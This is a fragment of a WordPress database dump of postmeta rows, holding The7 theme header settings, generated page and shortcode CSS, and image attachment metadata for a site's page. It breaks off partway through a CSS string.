(26031,3610,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26032,3613,'_edit_lock','1675608462:1'),
(26033,3613,'_edit_last','1'),
(26034,3613,'_wpb_vc_js_status','true'),
(26035,3613,'_dt_sidebar_position','disabled'),
(26036,3613,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26037,3613,'_dt_sidebar_hide_on_mobile','0'),
(26038,3613,'_dt_footer_show','1'),
(26039,3613,'_dt_footer_widgetarea_id','sidebar_2'),
(26040,3613,'_dt_footer_hide_on_mobile','0'),
(26041,3613,'_dt_header_title','fancy'),
(26042,3613,'_dt_header_background','normal'),
(26043,3613,'_dt_header_background_below_slideshow','disabled'),
(26044,3613,'_dt_header_transparent_bg_color_scheme','light'),
(26045,3613,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26046,3613,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26047,3613,'_dt_header_transparent_bg_color','#000000'),
(26048,3613,'_dt_header_transparent_bg_opacity','50'),
(26049,3613,'_dt_header_disabled_background','normal'),
(26050,3613,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26051,3613,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26052,3613,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26053,3613,'_dt_header_disabled_transparent_bg_color','#000000'),
(26054,3613,'_dt_header_disabled_transparent_bg_opacity','50'),
(26055,3613,'_dt_page_overrides_top_margin',''),
(26056,3613,'_dt_page_overrides_right_margin',''),
(26057,3613,'_dt_page_overrides_bottom_margin',''),
(26058,3613,'_dt_page_overrides_left_margin',''),
(26059,3613,'_dt_mobile_page_padding_top',''),
(26060,3613,'_dt_mobile_page_padding_right',''),
(26061,3613,'_dt_mobile_page_padding_bottom',''),
(26062,3613,'_dt_mobile_page_padding_left',''),
(26063,3613,'_dt_fancy_header_layout_heading',''),
(26064,3613,'_dt_fancy_header_title_aligment','center'),
(26065,3613,'_dt_fancy_header_height','300'),
(26066,3613,'_dt_fancy_header_padding-top','0px'),
(26067,3613,'_dt_fancy_header_padding-bottom','0px'),
(26068,3613,'_dt_fancy_header_breadcrumbs_heading',''),
(26069,3613,'_dt_fancy_header_breadcrumbs','disabled'),
(26070,3613,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26071,3613,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26072,3613,'_dt_fancy_header_title_heading',''),
(26073,3613,'_dt_fancy_header_title_mode','custom'),
(26074,3613,'_dt_fancy_header_title',''),
(26075,3613,'_dt_fancy_header_title_font_size','30'),
(26076,3613,'_dt_fancy_header_title_line_height','36'),
(26077,3613,'_dt_fancy_header_text_transform','none'),
(26078,3613,'_dt_fancy_header_title_color_mode','color'),
(26079,3613,'_dt_fancy_header_title_color','#1e73be'),
(26080,3613,'_dt_fancy_header_subtitle_heading',''),
(26081,3613,'_dt_fancy_header_subtitle',''),
(26082,3613,'_dt_fancy_header_subtitle_font_size','18'),
(26083,3613,'_dt_fancy_header_subtitle_line_height','26'),
(26084,3613,'_dt_fancy_header_subtitle_text_transform','none'),
(26085,3613,'_dt_fancy_header_subtitle_color_mode','color'),
(26086,3613,'_dt_fancy_header_subtitle_color','#ffffff'),
(26087,3613,'_dt_fancy_header_bg_heading',''),
(26088,3613,'_dt_fancy_header_bg_color','#222222'),
(26089,3613,'_dt_fancy_header_bg_image_origin','featured_image'),
(26090,3613,'_dt_fancy_header_bg_image','a:0:{}'),
(26091,3613,'_dt_fancy_header_bg_repeat','no-repeat'),
(26092,3613,'_dt_fancy_header_bg_position_x','center'),
(26093,3613,'_dt_fancy_header_bg_position_y','center'),
(26094,3613,'_dt_fancy_header_bg_fullscreen','1'),
(26095,3613,'_dt_fancy_header_bg_overlay','0'),
(26096,3613,'_dt_fancy_header_overlay_color','#000'),
(26097,3613,'_dt_fancy_header_bg_overlay_opacity','50'),
(26098,3613,'_dt_fancy_header_scroll_effect','default'),
(26099,3613,'_dt_fancy_header_bg_parallax','0.5'),
(26100,3613,'_dt_fancy_header_responsiveness_heading',''),
(26101,3613,'_dt_fancy_header_responsiveness','disabled'),
(26102,3613,'_dt_fancy_header_responsiveness_switch','778px'),
(26103,3613,'_dt_fancy_header_responsive_height','70'),
(26104,3613,'_dt_fancy_header_responsive_font_size','30'),
(26105,3613,'_dt_fancy_header_responsive_title_line_height','38'),
(26106,3613,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26107,3613,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26108,3613,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26109,3613,'_dt_project_options_back_button',''),
(26110,3613,'_dt_project_options_show_link',''),
(26111,3613,'_dt_project_options_link',''),
(26112,3613,'_dt_project_options_link_target',''),
(26113,3613,'_dt_project_options_link_name',''),
(26114,3613,'_dt_project_options_hide_thumbnail','1'),
(26115,3613,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(26116,3613,'_dt_project_options_related_mode','same'),
(26117,3613,'_dt_project_options_preview','normal'),
(26118,3613,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/01/youthm2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #1e73be;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26119,3615,'_wp_attached_file','2023/01/youthm2.jpg'),
(26120,3615,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:690;s:6:\"height\";i:515;s:4:\"file\";s:19:\"2023/01/youthm2.jpg\";s:8:\"filesize\";i:127543;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"youthm2-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17849;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"youthm2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7816;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"youthm2-500x373.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39667;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26121,3613,'_thumbnail_id','3615'),
(26122,3613,'_wp_page_template','default'),
(26123,3613,'_dt_microsite_primary_menu',''),
(26124,3613,'_dt_microsite_split_left_menu',''),
(26125,3613,'_dt_microsite_split_right_menu',''),
(26126,3613,'_dt_microsite_mobile_menu',''),
(26127,3618,'_wp_attached_file','2023/01/youthm1.jpg'),
(26128,3618,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:448;s:4:\"file\";s:19:\"2023/01/youthm1.jpg\";s:8:\"filesize\";i:89772;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"youthm1-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15440;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"youthm1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6061;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"youthm1-500x373.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33816;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26129,3620,'_wp_attached_file','2023/01/youthm3.jpg'),
(26130,3620,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:448;s:4:\"file\";s:19:\"2023/01/youthm3.jpg\";s:8:\"filesize\";i:71133;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"youthm3-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12071;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"youthm3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5369;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"youthm3-500x373.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25407;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26131,3613,'the7_shortcodes_dynamic_css','a:2:{s:32:\"939e84dc43befd01b2f12995330508dc\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-939e84dc43befd01b2f12995330508dc.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n 